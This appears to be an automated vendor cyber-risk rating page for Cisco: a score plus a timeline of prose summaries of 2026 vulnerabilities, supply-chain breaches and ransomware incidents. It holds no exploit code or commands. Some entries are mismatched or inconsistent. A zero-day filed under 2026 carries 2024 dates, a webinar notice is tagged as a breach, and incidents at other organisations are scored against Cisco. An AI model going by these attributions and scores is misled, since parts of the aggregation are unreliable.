Cisco Vendor Cyber Rating & Cyber Score

cisco.com

Cisco is the worldwide technology leader that is revolutionizing the way organizations connect and protect in the AI era. For more than 40 years, Cisco has securely connected the world. With its industry leading AI-powered solutions and services, Cisco enables its customers, partners and communities to unlock innovation, enhance productivity and strengthen digital resilience. With purpose at its core, Cisco remains committed to creating a more connected and inclusive future for all.


Cisco A.I CyberSecurity Scoring

Company Information
Website: http://www.cisco.com
Employees number: 95,370
Number of followers: 7,281,720
NAICS: 5112
Industry Type: Software Development
Homepage: cisco.com

Cisco Risk Score (AI oriented)
Range: between 0 and 549 (Critical)
Cisco, Software Development
Updated: 04/06/2026
Score: 294/1000, grade C (Critical)

Current Score: 294 C (Critical)
51 incidents, -10.81 avg impact
Incident timeline with MITRE ATT&CK tactics, techniques, and mitigations.
JUNE 2026
Score before incident: 321
Vulnerability
04 Jun 2026, Cisco
Cisco: PoC Exploit Released for Cisco Unified Communications Manager Security Vulnerability
Critical SSRF Vulnerability in Cisco Unified CM Exploited via Public PoC
Score after incident: 297 (Critical, -24)
Incident ID: CIS1780568638
A proof-of-concept (PoC) exploit has been released for a critical server-side request forgery (SSRF) vulnerability in Cisco Unified Communications Manager (Unified CM) and Unified CM Session Management Edition (Unified CM SME), tracked as CVE-2026-20230. The flaw is rated 8.6 (High) on the CVSS v3.1 scale but is classified as Critical by Cisco because it can lead to root-level privilege escalation, and it exposes vulnerable systems to remote exploitation.

The vulnerability arises from improper input validation in HTTP requests (CWE-918), allowing unauthenticated attackers to interact with internal services. By sending crafted HTTP requests, threat actors can perform SSRF attacks and write arbitrary files to the underlying OS, enabling privilege escalation and potential full system compromise. Exploitation is only possible if the Cisco WebDialer service (disabled by default, but active in some deployments) is enabled.

The public release of the PoC exploit heightens the risk, as it provides attackers with a functional attack method. Security researchers confirm the exploit demonstrates SSRF-based file-writing capabilities, which could be used for persistence or further lateral movement, particularly in internet-facing or compromised internal networks.

Affected systems include Cisco Unified CM and Unified CM SME with the WebDialer service running. Administrators can check vulnerability status via the Cisco Unified CM Administration interface under Cisco Unified Serviceability > Control Center – Feature Services. If the Cisco WebDialer Web Service is marked as "Started," the system is exposed.

Cisco has released software updates to patch the flaw, with no official workarounds available. As a temporary mitigation, disabling the WebDialer service is recommended. Additional defensive measures include restricting access to management interfaces and monitoring for suspicious outbound HTTP requests or unauthorized file creation. While no active compromises have been reported, organizations are urged to prioritize patching due to the high risk of exploitation and the potential for root-level access. The vulnerability underscores the urgency of securing enterprise communication systems against SSRF-based attacks.
INCIDENT DETAILS
Type: SSRF (Server-Side Request Forgery)
Impact:
- Systems Affected: Cisco Unified CM and Unified CM SME with WebDialer service enabled
- Operational Impact: Potential full system compromise, root-level privilege escalation
Breach
04 Jun 2026, Cisco
Trump campaign and Cisco: Webinar Today: Third-Party Risk in Practice – Where Programs Break Down and How to Respond
Third-Party Risk Management Gaps Exposed as AI-Driven Threats Escalate
Score after incident: 297 (Critical, -24)
Incident ID: CISTHE1780591442
Organizations are pouring resources into third-party risk management, yet breaches, delays, and blind spots persist, revealing a stark disconnect between perceived and actual program effectiveness. A recent analysis highlights how attackers are leveraging AI to scale threats, from generating malware to bypassing security checks, while security teams struggle to keep pace with machine-speed attacks. Key challenges include unmonitored generative AI use ("Shadow AI") within business units, slow assessment timelines, and manual bottlenecks that create hidden risks. Even mature programs face vulnerabilities, particularly as fourth-party exposure extends beyond traditional third-party oversight. Meanwhile, enterprises rushing AI projects into production are often forced into reactive security postures, leaving critical gaps unaddressed.

Industry responses are emerging: IBM and Red Hat have committed $5 billion to secure open-source supply chains under Project Lightwell, while startups like Offroad ($7M) and Ocean ($28M) are targeting identity and email security risks. CISOs are also grappling with remediation at scale, as AI-driven attacks demand adaptive defenses.

Recent incidents underscore the urgency: a Trump campaign mobile data breach, FIFA World Cup phishing schemes, and CISA’s response to supply chain attacks. Meanwhile, vulnerabilities like the Mirasvit flaw in Magento servers and a critical Cisco Unified CM exploit with available proof-of-concept code demonstrate the ongoing threat landscape. As AI reshapes cybersecurity, organizations are urged to align security, continuity, and risk management around critical assets, though persistent visibility gaps and assessment inefficiencies remain hurdles. The shift toward AI-driven defenses is accelerating, but the race to close third-party risk gaps is far from over.
INCIDENT DETAILS
Type: Third-Party Risk Management Failure; AI-Driven Cyber Threats
Motivation: Financial Gain; Data Exfiltration; Disruption
Impact:
- Magento servers; Cisco Unified CM
- Operational Impact: Reactive security postures due to rushed AI projects
MAY 2026
Score before incident: 310
Vulnerability
21 May 2026, Cisco
Cisco: Critical Cisco Secure Workload Vulnerability Enables Unauthorized API Access
Critical Cisco Secure Workload Vulnerability Exposes Internal APIs to Unauthenticated Attacks
Score after incident: 309 (Critical, -1)
Incident ID: CIS1779359208
Cisco has disclosed a severe security flaw (CVE-2026-20223) in its Secure Workload platform, allowing unauthenticated attackers to gain Site Admin-level privileges via improperly secured internal REST APIs. With a CVSS score of 10.0, the vulnerability stems from missing authentication and insufficient validation in API endpoints, enabling attackers to send crafted requests without credentials. Successful exploitation could grant full control over affected environments, including access to sensitive data, configuration modifications, and cross-tenant risks in shared deployments.

The flaw impacts both SaaS and on-premises versions of Cisco Secure Workload Cluster Software, though it does not affect the web-based management interface. Cisco has released patches for affected versions:
- 3.10: Fixed in 3.10.8.3
- 4.0: Fixed in 4.0.3.17
- 3.9 and earlier: Require migration to a supported release

For SaaS deployments, Cisco has already applied fixes, requiring no customer action. While no active exploitation or public proof-of-concept has been reported, the critical severity and low attack complexity make this a high-priority risk for security teams. The vulnerability was discovered during internal security testing, underscoring the growing threat posed by unsecured internal APIs, which are often overlooked in traditional security assessments. Cisco’s advisory highlights the need for robust authentication and validation across all API layers as attackers increasingly target backend services.
INCIDENT DETAILS
Type: Vulnerability Exploitation
Impact:
- Data Compromised: Sensitive data
- Systems Affected: Cisco Secure Workload Cluster Software (SaaS and on-premises)
- Operational Impact: Full control over affected environments, configuration modifications, cross-tenant risks
Data Breach:
- Type Of Data Compromised: Sensitive data
- Sensitivity Of Data: High
MAY 2026
Score before incident: 332
Breach
14 May 2026, Cisco
GitHub: Cyber Security News ®’s Post
GitHub Internal Source Code Breach by TeamPCP Threat Actor
Score after incident: 308 (Critical, -24)
Incident ID: GIT1779251025
GitHub Confirms Internal Source Code Breach by TeamPCP Threat Actor

A cybercriminal group known as TeamPCP has claimed responsibility for breaching GitHub’s internal systems, allegedly stealing proprietary data, including source code from approximately 4,000 private repositories. The threat actor announced the breach via a post on X (formerly Twitter), asserting access to sensitive internal assets tied to GitHub’s core platform.

GitHub acknowledged the incident in a public statement, confirming unauthorized access to its internal repositories while emphasizing that customer data remains unaffected. The company is actively investigating the scope and impact of the breach. The incident highlights ongoing risks to software supply chains, as threat actors increasingly target development environments to exploit vulnerabilities or extract intellectual property. No further details on the attack vector or potential motives have been disclosed.
INCIDENT DETAILS
Type: Data Breach
Impact:
- Data Compromised: Proprietary data, including source code from approximately 4,000 private repositories
- Systems Affected: Internal repositories
Data Breach:
- Type Of Data Compromised: Source code, proprietary data
- Number Of Records Exposed: Approximately 4,000 private repositories
- Sensitivity Of Data: High (internal assets tied to GitHub’s core platform)
- Personally Identifiable Information: None (customer data unaffected)
APRIL 2026
Score before incident: 322
Vulnerability
15 Apr 2026, Cisco
Cisco: Cisco Webex Services Vulnerability Lets Remote Attackers Impersonate Any User
Critical Webex Vulnerability Allowing Unauthorized Access (CVE-2026-20184)
Score after incident: 321 (Critical, -1)
Incident ID: CIS1776327928
Cisco Warns of Critical Webex Vulnerability Allowing Unauthorized Access

Cisco has issued an urgent security advisory regarding a critical vulnerability (CVE-2026-20184) in its Webex communication platform, which could enable remote attackers to impersonate registered users and bypass authentication. The flaw, disclosed on April 15, 2026, stems from improper certificate validation in the platform’s single sign-on (SSO) integration with Cisco Control Hub. With a severity score of 9.8/10, the vulnerability (classified as CWE-295) allows unauthenticated threat actors to exploit misconfigured SSO connections by sending malicious digital tokens. If successful, attackers could gain full access to Webex meetings, files, and private communication channels while appearing as legitimate users, making detection difficult for monitoring tools.

Cisco has patched its cloud-based Webex infrastructure, but enterprise administrators must take manual steps to secure their environments. Affected organizations are required to generate and upload a new SAML certificate via the Webex Control Hub and verify compliance with updated certificate validation processes. No temporary workarounds exist, and Cisco’s Product Security Incident Response Team (PSIRT) has confirmed no active exploitation or public proof-of-concept attacks at this time. The incident highlights the risks of improper certificate management in cloud-based collaboration tools.
INCIDENT DETAILS
Type: Vulnerability Exploitation
Impact:
- Data Compromised: Webex meetings, files, and private communication channels
- Systems Affected: Cisco Webex (SSO integration with Cisco Control Hub)
- Operational Impact: Unauthorized access to sensitive communications and data
- Brand Reputation Impact: Potential reputational damage due to authentication bypass
- Identity Theft Risk: Risk of impersonation and unauthorized access
Data Breach:
- Type Of Data Compromised: Meeting data, files, private communications
- Sensitivity Of Data: High (private communications and files)
APRIL 2026
Score before incident: 320
Vulnerability
06 Apr 2026, Cisco
Cisco: MSN
Critical Zero-Day Exploit in Progress: Cisco ASA and FTD Devices Under Active Attack
Score after incident: 319 (Critical, -1)
Incident ID: CIS1775493782
A severe zero-day vulnerability in Cisco’s Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software is being actively exploited in the wild, with threat actors targeting unpatched systems to gain unauthorized access. The flaw, tracked as CVE-2024-20353 (CVSS score: 8.6), allows attackers to execute arbitrary code remotely by sending specially crafted packets to affected devices.

Key Details:
- Who: Cisco confirmed the vulnerability, attributing exploitation attempts to an unidentified advanced persistent threat (APT) group. Security researchers at Cisco Talos and Rapid7 independently detected the attacks.
- What: The flaw stems from improper input validation in the web services interface of ASA and FTD devices, enabling unauthenticated remote code execution (RCE) without user interaction.
- When: Exploitation attempts were first observed in late March 2024, with Cisco releasing an advisory and patches on April 24, 2024. Attacks have intensified since the disclosure.
- Where: Targets include enterprise networks, government agencies, and critical infrastructure sectors globally, with a concentration in North America and Europe.
- Why: While Cisco has not disclosed specific motives, the sophistication of the attacks suggests espionage or pre-positioning for future disruptive operations.

Impact: Successful exploitation grants attackers full control over vulnerable devices, potentially leading to lateral movement, data exfiltration, or network disruption. Cisco has urged organizations to apply patches immediately, as proof-of-concept (PoC) exploits are already circulating in underground forums. Unpatched systems remain at high risk, with over 10,000 exposed devices identified via public scans.

Cisco has released software updates (ASA 9.18.4.15 and FTD 7.2.5) to mitigate the flaw, alongside temporary workarounds, including disabling web services on affected interfaces. The incident underscores the growing threat of zero-day exploits targeting perimeter security devices.
INCIDENT DETAILS
Type: Zero-Day Exploit
Motivation: Espionage; Pre-positioning for future disruptive operations
Impact:
- Data Compromised: Potential data exfiltration
- Systems Affected: Cisco ASA and FTD devices
- Operational Impact: Network disruption, lateral movement
Data Breach:
- Data Exfiltration: Potential
APRIL 2026
Score before incident: 321
Vulnerability
02 Apr 2026, Cisco
Cisco: Cisco Warns of Critical IMC Vulnerability Enabling Authentication Bypass
Critical Cisco IMC Authentication Bypass Flaw Grants Full Admin Access (CVE-2026-20093)
Score after incident: 320 (Critical, -1)
Incident ID: CIS1775111249
Cisco has issued an urgent security advisory for CVE-2026-20093, a 9.8-severity authentication bypass vulnerability in its Integrated Management Controller (IMC) software. The flaw allows unauthenticated remote attackers to overwrite administrative passwords and gain full control over vulnerable Cisco servers and network appliances.

The vulnerability stems from improper handling of password change requests in the IMC software. By sending a maliciously crafted HTTP request to the management interface, attackers can alter passwords for any user (including Admin accounts) without prior authentication. Successful exploitation grants complete administrative privileges over affected systems.

Discovered by security researcher "jyh" and reported to Cisco’s Product Security Incident Response Team (PSIRT), the flaw has no known public exploits or active attacks at this time. However, Cisco warns that no workarounds or mitigations exist; patching is the only remediation.

### Affected Hardware
The vulnerability impacts a range of Cisco devices running vulnerable IMC versions, including:
- 5000 Series Enterprise Network Compute Systems (ENCS)
- Catalyst 8300 Series Edge uCPE platforms
- UCS C-Series M5/M6 Rack Servers and UCS E-Series M3/M6 servers
- Preconfigured network appliances exposing the IMC interface, such as:
  - Application Policy Infrastructure Controller (APIC) servers
  - Catalyst Center Appliances
  - Secure Firewall Management Center Appliances
  - Secure Network Analytics Appliances

### Remediation
Cisco has released patched firmware updates for affected devices. Administrators must apply fixes via:
- NFVIS upgrade process (for ENCS and uCPE platforms)
- Cisco Host Upgrade Utility (HUU) (for UCS servers)
- Out-of-band update procedures (for specific appliances)

Details on fixed versions are available in Cisco’s official advisory. Given the critical severity and lack of mitigations, immediate patching is essential to prevent unauthorized access.
INCIDENT DETAILS
Type: Authentication Bypass
Impact:
- Systems Affected: Full administrative privileges over affected systems
- Operational Impact: Complete administrative control over vulnerable Cisco servers and network appliances
APRIL 2026
Score before incident: 322
Vulnerability
01 Apr 2026, Cisco
Trivy, Cisco, Salesforce, AWS and Aura: Cisco Faces Alleged Data Leak as ShinyHunters Claims Responsibility
Cisco Hit by Major Cyberattack Linked to Supply Chain Breach
Score after incident: 319 (Critical, -3)
Incident ID: AQUUSEAMASALCIS1775046662
Cisco is responding to a significant cybersecurity incident after threat actors breached its internal development networks, stealing sensitive source code and corporate data. The attack, claimed by the hacking group ShinyHunters, also allegedly impacted Salesforce, Aura, and AWS storage buckets.

The breach originated from a supply chain attack involving Trivy, a widely used vulnerability scanner. Attackers exploited a malicious GitHub Action plugin tied to the Trivy compromise, allowing them to steal credentials and infiltrate Cisco’s build environments. Once inside, they compromised dozens of devices, including lab workstations and developer systems, gaining access to highly sensitive data. The stolen material includes AWS keys, which were used to perform unauthorized actions in Cisco’s cloud accounts, and over 300 private GitHub repositories. These repositories contain unreleased product source code, including AI Assistants and AI Defense technologies, as well as data belonging to corporate clients, such as major banks, BPO firms, and U.S. government agencies.

Cisco’s security teams (including the Unified Intelligence Center, CSIRT, and EOC) moved quickly to contain the breach by isolating affected systems, wiping compromised machines, and enforcing a mass credential reset. However, the company has not yet issued a public statement, and internal sources suggest ongoing complications from the incident.

While ShinyHunters has taken credit for the data theft, security researchers link the underlying Trivy supply chain attack to TeamPCP, a separate group known for deploying custom malware ("TeamPCP Cloud Stealer") to hijack developer platforms like Docker, NPM, and PyPi. TeamPCP has also been tied to recent breaches of LiteLLM and Checkmarx, raising concerns about secondary attacks stemming from related vulnerabilities.
INCIDENT DETAILS
Type: Supply Chain Attack, Data Breach
Impact:
- Data Compromised: AWS keys, over 300 private GitHub repositories (unreleased product source code, AI Assistants, AI Defense technologies, corporate client data)
- Systems Affected: Dozens of devices (lab workstations, developer systems, build environments)
- Operational Impact: Isolation of affected systems, mass credential reset, ongoing complications
Data Breach:
- Source code; Corporate data; AWS keys; AI technologies; Client data
- Number Of Records Exposed: Over 300 private GitHub repositories
- Sensitivity Of Data: High (unreleased product source code, AI Assistants, AI Defense technologies, corporate client data)
MARCH 2026
Score before incident: 324
Cyber Attack
17 Mar 2026, Cisco
Trivy: Trivy supply chain breach compromises over 1,000 SaaS environments, Lapsus$ joins the extortion wave
Supply Chain Attack on Trivy Expands into Lapsus$-Linked Extortion Campaign, Compromising Over 1,000 SaaS Environments
Score after incident: 318 (Critical, -6)
Incident ID: AQU1774441468
A sophisticated supply chain attack targeting Trivy, a widely used open-source security scanner, has escalated into a large-scale extortion campaign linked to the cybercriminal group Lapsus$, compromising over 1,000 enterprise SaaS environments. The attack, first detected in late February, involved the compromise of Trivy’s VS Code extension, GitHub Action, and Docker Hub artifacts, with malicious payloads distributed through manipulated version tags and cached mirror infrastructure.

The threat actors, initially identified as the cloud-native group TeamPCP, gained persistent access to Aqua Security’s GitHub organization, defacing all 44 repositories with the message “TeamPCP Owns Aqua Security.” Mandiant’s investigation revealed that the attackers later funneled stolen access to broader criminal networks, including Lapsus$, known for aggressive extortion tactics. The attack leveraged stolen credentials, likely obtained through a third-party breach, to backdoor multiple components, including LiteLLM, an AI middleware library embedded in cloud environments. Security firms Wiz and Socket confirmed that the campaign expanded across the npm ecosystem, with over 29 malicious packages distributed using compromised publish tokens. Despite takedown efforts, cached copies of the malicious Trivy artifacts continued circulating via mirror infrastructure like mirror.gcr.io.

Security experts warned that the attackers timed their escalation strategically, waiting until defenders were distracted by RSA Conference 2026 before launching follow-on attacks. Cory Michal (AppOmni) and Isaac Evans (Semgrep) emphasized that the incident highlights critical weaknesses in third-party code governance, with attackers exploiting implicit trust in supply chains and mutable version tags to scale their reach.

Aqua Security confirmed that its commercial products remain unaffected due to architectural isolation, but credential revocation and rotation efforts are ongoing. Mandiant has yet to determine the initial source of the stolen credentials, suspecting a breach at a business process outsourcer or partner organization. As the fallout continues, the attackers have publicly signaled plans to target additional open-source projects, with security researchers warning that the 1,000+ downstream victims could expand significantly in the coming months. The incident underscores the growing threat of supply chain attacks, where a single compromise can cascade across thousands of organizations.
INCIDENT DETAILS
Type: Supply Chain Attack, Extortion Campaign
Motivation: Extortion; Data theft; Supply chain disruption
Impact:
- 1,000+ enterprise SaaS environments; GitHub repositories; npm ecosystem
- Operational Impact: Credential revocation and rotation efforts ongoing
- Brand Reputation Impact: Defacement of Aqua Security’s GitHub repositories
Data Breach:
- Stolen credentials; Access tokens
- Sensitivity Of Data: High (potential access to enterprise SaaS environments)
MARCH 2026
Score before incident: 324
Vulnerability
12 Mar 2026, Cisco
Cisco: Cisco IOS XR Vulnerability Exposes Systems to Root Command Execution by Attackers
Cisco Patches High-Severity Privilege Escalation Flaws in IOS XR Software
Score after incident: 323 (Critical, -1)
Incident ID: CIS1773304317
Cisco has released high-severity software updates to address two critical privilege escalation vulnerabilities in its IOS XR Software, which could allow authenticated, local attackers to gain root-level access or full administrative control over affected devices. Given the role of these routers in enterprise networks, the flaws pose a significant security risk.

### Vulnerability Details
Both vulnerabilities are rated High severity (CVSS 8.8/10) and can be exploited independently:
1. CVE-2026-20040 – A CLI privilege escalation flaw caused by improper validation of user-supplied arguments in certain commands. A low-privileged attacker could execute arbitrary commands as root on the underlying OS.
2. CVE-2026-20046 – A CLI privilege escalation issue in Cisco IOS XRv 9000 Routers, stemming from incorrect command-to-task-group mapping. Attackers could bypass security checks to perform unauthorized administrative actions.

Cisco confirmed that IOS, IOS XE, and NX-OS Software are not affected by these flaws.

### Mitigation & Patching
Cisco urges administrators to upgrade to fixed software versions (e.g., 25.2.21, 25.4.2) or apply Software Maintenance Updates (SMUs). For CVE-2026-20040, patching is mandatory, as no workarounds exist. For CVE-2026-20046, organizations using TACACS+ AAA command authorization can restrict unauthorized command access as a temporary measure. Systems running older versions (25.1 or earlier, 25.3 branch) are particularly vulnerable and should migrate to patched releases immediately.
INCIDENT DETAILS
Type: Privilege Escalation
Impact:
- Systems Affected: Cisco IOS XR Software, IOS XRv 9000 Routers
- Operational Impact: Full administrative control over affected devices
MARCH 2026
Score before incident: 330
Cyber Attack
01 Mar 2026, Cisco
BadeSaba: Hackers hit Iranian apps, websites after US-Israeli strikes
Cyber Retaliation Likely as U.S.-Israeli Strikes Trigger Iranian Digital Disruptions
Score after incident: 321 (Critical, -9)
Incident ID: BAD1772389516
On March 1, 2026, a series of cyber operations unfolded alongside joint U.S.-Israeli airstrikes targeting Iran, signaling potential escalation in digital warfare. Cybersecurity experts reported multiple breaches, including the hack of BadeSaba, a widely used Iranian religious app with over 5 million downloads. The app displayed messages urging armed forces to disarm and join civilians, while other compromised news websites broadcast similar calls for accountability. Internet connectivity in Iran experienced sharp drops at 0706 GMT and 1147 GMT, according to Doug Madory of Kentik, with only minimal service remaining. The Jerusalem Post reported cyberattacks on Iranian government and military systems, though Reuters could not independently verify these claims.

Security researchers noted the strategic targeting of BadeSaba, as its user base (primarily religious and pro-government) made it a high-impact platform for psychological operations. Cybersecurity firms warned of impending retaliation, with Sophos’ Rafe Pilling highlighting potential tactics, including amplified data breaches, unsophisticated industrial system compromises, and direct offensive cyber operations. Pro-Iranian hacktivist groups, known for past hack-and-leak campaigns, ransomware, and DDoS attacks, have already issued calls to action, per Halcyon’s Cynthia Kaiser. CrowdStrike observed reconnaissance and DDoS activity from Iranian-aligned actors, while Anomali reported state-backed Iranian groups deploying "wiper" attacks against Israeli targets ahead of the strikes.

Despite Iran’s reputation as a cyber threat alongside Russia and China, its past responses to physical attacks have been limited. Following U.S. strikes on Iranian nuclear sites in June, cyber retaliation was minimal, with only a brief disruption in Albania’s capital, Tirana. However, the current escalation suggests a shift toward more aggressive digital countermeasures.
INCIDENT DETAILS
Type: Cyber Espionage; Psychological Operation; DDoS; Wiper Attack
Motivation: Retaliation; Psychological Warfare; Disruption
Impact:
- BadeSaba App; Iranian Government Systems; Military Systems; News Websites
- Downtime: Sharp drops in internet connectivity at 0706 GMT and 1147 GMT
- Operational Impact: Minimal internet service remaining in Iran
- Brand Reputation Impact: High (psychological impact on pro-government users)
Vulnerability
01 Mar 2026, Cisco
Cisco: Cisco Secure Firewall Vulnerability Exposes Networks to Authentication Bypass Attacks
Critical Cisco Secure Firewall Flaw Grants Unauthenticated Root Access (CVE-2026-20079)
Score after incident: 321 (Critical, -9)
Incident ID: CIS1772699055
Cisco has disclosed a critical vulnerability (CVE-2026-20079) in its Secure Firewall Management Center (FMC) Software, allowing unauthenticated remote attackers to gain full root access to affected devices. With a CVSS score of 10.0, the flaw poses a severe risk to enterprise network security.

The vulnerability was discovered during internal testing by Cisco researcher Brandon Sakai and stems from an improperly initialized system process during the device’s boot sequence. Attackers can exploit it by sending crafted HTTP requests to the FMC web interface, bypassing authentication entirely. Successful exploitation enables threat actors to execute malicious scripts, alter security policies, monitor network traffic, and pivot deeper into corporate systems.

This flaw exclusively affects on-premises deployments of Cisco Secure FMC Software, regardless of configuration. No workarounds or mitigations exist, leaving unpatched systems highly vulnerable. Cloud-delivered FMC (cdFMC), Secure Firewall ASA, FTD Software, and Security Cloud Control remain unaffected.

As of March 2026, Cisco’s Product Security Incident Response Team (PSIRT) reports no evidence of active exploitation in the wild. However, organizations must immediately upgrade to a patched software release to prevent potential breaches. Cisco provides a Software Checker tool to help administrators identify vulnerable versions and apply fixes. The flaw underscores the critical importance of timely patch management for firewall infrastructure.
INCIDENT DETAILS
Type: Vulnerability Exploitation
Impact:
- Systems Affected: Cisco Secure Firewall Management Center (FMC) Software (on-premises deployments)
- Operational Impact: Potential execution of malicious scripts, alteration of security policies, network traffic monitoring, and lateral movement within corporate systems
FEBRUARY 2026
Score before incident: 330
Vulnerability
25 Feb 2026, Cisco
Cisco: ALERT! Five Eyes nations release emergency directive over critical – and exploited – Cisco Catalyst SD-WAN Controller vulnerability
Critical Cisco SD-WAN Vulnerability Exploited by Sophisticated Threat Actor
Score after incident: 329 (Critical, -1)
Incident ID: CIS1772080050
Australia’s Cyber Security Centre (ACSC), alongside its Five Eyes partners, has issued an emergency directive warning of a severe authentication bypass vulnerability in Cisco’s SD-WAN systems. Tracked as CVE-2026-20127 (disclosed on 25 February), the flaw carries a perfect CVSS score of 10 and affects the Cisco Catalyst SD-WAN Controller and SD-WAN Manager. If exploited, the vulnerability allows remote attackers to bypass authentication and gain administrative privileges, enabling them to manipulate network configurations via NETCONF. The ACSC confirmed global exploitation, with threat actors adding rogue peers to establish long-term persistence and escalate to root access in compromised SD-WAN environments.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) emphasized the urgency of mitigation, despite an ongoing government shutdown. Acting Director Dr. Madhu Gottumukkala warned that the flaw’s ease of exploitation demands immediate action, particularly for federal agencies. Cisco’s threat intelligence unit, Talos, attributed the activity to UAT-8616, a highly sophisticated actor with operations dating back to at least 2023. The group reportedly exploited CVE-2022-20775 via a software version downgrade to escalate privileges before restoring the original version, evading detection. Rapid7’s Douglas McKee noted the actor’s stealthy, targeted approach, which allows persistence in high-value infrastructure without triggering broad alarms.

CISA and partners recommend immediate patching, device inventory checks, forensic snapshots, and full system rebuilds, as Cisco advises that patching alone may be insufficient to remove existing intrusions. WatchTowr’s Ryan Dewhurst stressed the need for organizations to hunt for prior compromise, given the actor’s ability to maintain undetected access.
INCIDENT DETAILS -
TYPE
Authentication Bypass
IMPACT
Systems Affected: Cisco Catalyst SD-WAN Controller and SD-WAN Manager
Operational Impact: Manipulation of network configurations, establishment of long-term persistence, escalation to root access
FEBRUARY 2026
325 Before Incident
Vulnerability
05 Feb 2026 Cisco
Cisco: Cisco Meeting Management Vulnerability Allows Remote Attackers to Upload Arbitrary Files

Cisco Patches High-Severity Vulnerability in Meeting Management Software

324 After Incident
CRITICAL-1
CIS1770280632
Cisco has released a high-severity security advisory addressing a critical flaw in Cisco Meeting Management (CMM) that could enable authenticated remote attackers to upload arbitrary files and execute commands with root privileges. Tracked as CVE-2026-20098, the vulnerability carries a CVSS score of 8.8, reflecting its severe impact on system confidentiality, integrity, and availability.

The flaw stems from improper input validation in the web-based management interface’s Certificate Management component. An attacker with valid credentials (specifically, video operator privileges or higher) could exploit the weakness by sending a crafted HTTP request, bypassing file sanitization and path validation. Successful exploitation allows the attacker to upload malicious files to system paths processed under the root account, enabling arbitrary command execution, system file modification, or full system compromise.

Affected versions include Cisco Meeting Management 3.12 and earlier, with the fix available in version 3.12.1 MR. Cisco has stated that no workarounds or configuration changes can mitigate the risk, making immediate patching the only effective remediation. The company also advises restricting access to the CMM web interface to trusted networks and enforcing strong authentication measures.

The vulnerability was responsibly disclosed by the NATO Cyber Security Centre Penetration Testing Team, and Cisco reports no evidence of active exploitation in the wild. Given the potential for root-level access, organizations using affected versions are urged to apply the update without delay.
INCIDENT DETAILS -
TYPE
Vulnerability Exploitation
IMPACT
Systems Affected: Cisco Meeting Management (CMM)
Operational Impact: Potential full system compromise, arbitrary command execution, system file modification
JANUARY 2026
324 Before Incident
Vulnerability
26 Jan 2026 Cisco
Cisco, City of Saint Paul and Minnesota: Ransomware crims abused Cisco 0-day weeks before disclosure

Interlock Ransomware Exploited Zero-Day in Cisco Firewall Before Patch

322 After Incident
CRITICAL-2
CISSAI1773859283
Ransomware group Interlock exploited a maximum-severity zero-day vulnerability (CVE-2026-20131) in Cisco Secure Firewall Management Center more than a month before the vendor released a patch. The flaw, allowing unauthenticated remote attackers to execute arbitrary Java code as root, was actively abused starting January 26, while Cisco issued fixes on March 4. Amazon’s CJ Moses, CISO of Amazon Integrated Security, revealed the timeline, stating that the company’s MadPot honeypot network detected exploit traffic tied to Interlock’s infrastructure. A misconfigured server also exposed the group’s attack toolkit, providing defenders with critical intelligence.

### Interlock’s Tactics and Toolkit

Interlock, a ransomware crew active since 2025, has targeted hospitals, medical facilities, and government entities, disrupting critical services (including chemotherapy sessions and pre-surgery appointments) and leaking sensitive data. Victims include Davita (kidney dialysis), Kettering Health, and the city of Saint Paul, Minnesota, where a 43 GB data breach forced a state of emergency.

The group’s post-exploitation toolkit includes:

- A PowerShell script harvesting system details (OS, hardware, services, software, storage, VM inventory, user files, RDP logs, and browser data).
- Custom remote access trojans (RATs) in JavaScript and Java, providing persistent access, command execution, file transfer, and SOCKS5 proxy capabilities.
- A Bash script configuring Linux servers as reverse proxies, wiping logs, and ensuring persistence.
- Memory-resident backdoors and lightweight network beacons to evade detection.
- Legitimate tools like ConnectWise ScreenConnect, Volatility, and Certify to blend malicious activity with authorized remote access.

### Redundant Access and Extortion Tactics

Interlock deploys multiple backdoors, including dual-language implants (JavaScript and Java), to maintain access even if one is detected. Their ransom notes threaten regulatory exposure, leveraging compliance violations alongside data encryption and leaks to pressure victims. Cisco has updated its security advisory, urging customers to apply patches immediately. The incident underscores the growing sophistication of ransomware groups in exploiting zero-days before public disclosure.
INCIDENT DETAILS -
TYPE
Ransomware
MOTIVATION
Financial gain, data extortion, regulatory pressure
IMPACT
Data Compromised: 43 GB (Saint Paul, Minnesota incident)
Systems Affected: Cisco Secure Firewall Management Center, hospital systems, government entities
Operational Impact: Disrupted chemotherapy sessions, pre-surgery appointments, and critical services
Brand Reputation Impact: High (data leaks, service disruptions)
Legal Liabilities: Potential regulatory violations
Identity Theft Risk: High (sensitive data leaked)
DATA BREACH
Type Of Data Compromised: Sensitive personal data, medical records, government data
Sensitivity Of Data: High (PII, medical data)
Data Exfiltration: Yes (43 GB leaked in Saint Paul incident)
Data Encryption: Yes (ransomware encryption)
Personally Identifiable Information: Yes
JANUARY 2026
326 Before Incident
Vulnerability
22 Jan 2026 Cisco
Synacor and Cisco: CISA Warns of Zimbra, SharePoint Flaw Exploits; Cisco Zero-Day Hit in Ransomware Attacks

CISA Warns of Actively Exploited Zimbra and SharePoint Vulnerabilities

323 After Incident
CRITICAL-3
CISSYN1774305072
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an alert urging federal agencies to patch two critical vulnerabilities, CVE-2025-66376 (CVSS 7.2) in Synacor Zimbra Collaboration Suite (ZCS) and CVE-2026-20963 (CVSS 8.8) in Microsoft Office SharePoint, after confirming active exploitation in the wild.

### Zimbra XSS Flaw Exploited in Targeted Cyberespionage

The Zimbra vulnerability (CVE-2025-66376), a stored cross-site scripting (XSS) flaw in the Classic UI, was patched in November 2025 (versions 10.0.18 and 10.1.13). However, a suspected Russian state-sponsored threat group has been exploiting it in Operation GhostMail, a campaign targeting Ukraine’s State Hydrographic Service (hydro.gov[.]ua). The attack leverages a socially engineered internship inquiry email, sent on January 22, 2026, from a compromised account at the National Academy of Internal Affairs. The email contains obfuscated JavaScript embedded in its HTML body, which executes when opened in a vulnerable Zimbra webmail session. Unlike traditional phishing, this attack requires no malicious attachments, links, or macros, only interaction with the email itself. The malware harvests credentials, session tokens, 2FA backup codes, browser-saved passwords, and 90 days of email data, exfiltrating it via DNS and HTTPS. Seqrite Labs, which uncovered the campaign, noted that this technique aligns with previous Russian operations like Operation RoundPress, which also exploited XSS flaws in webmail software.

### SharePoint Deserialization Flaw Under Active Attack

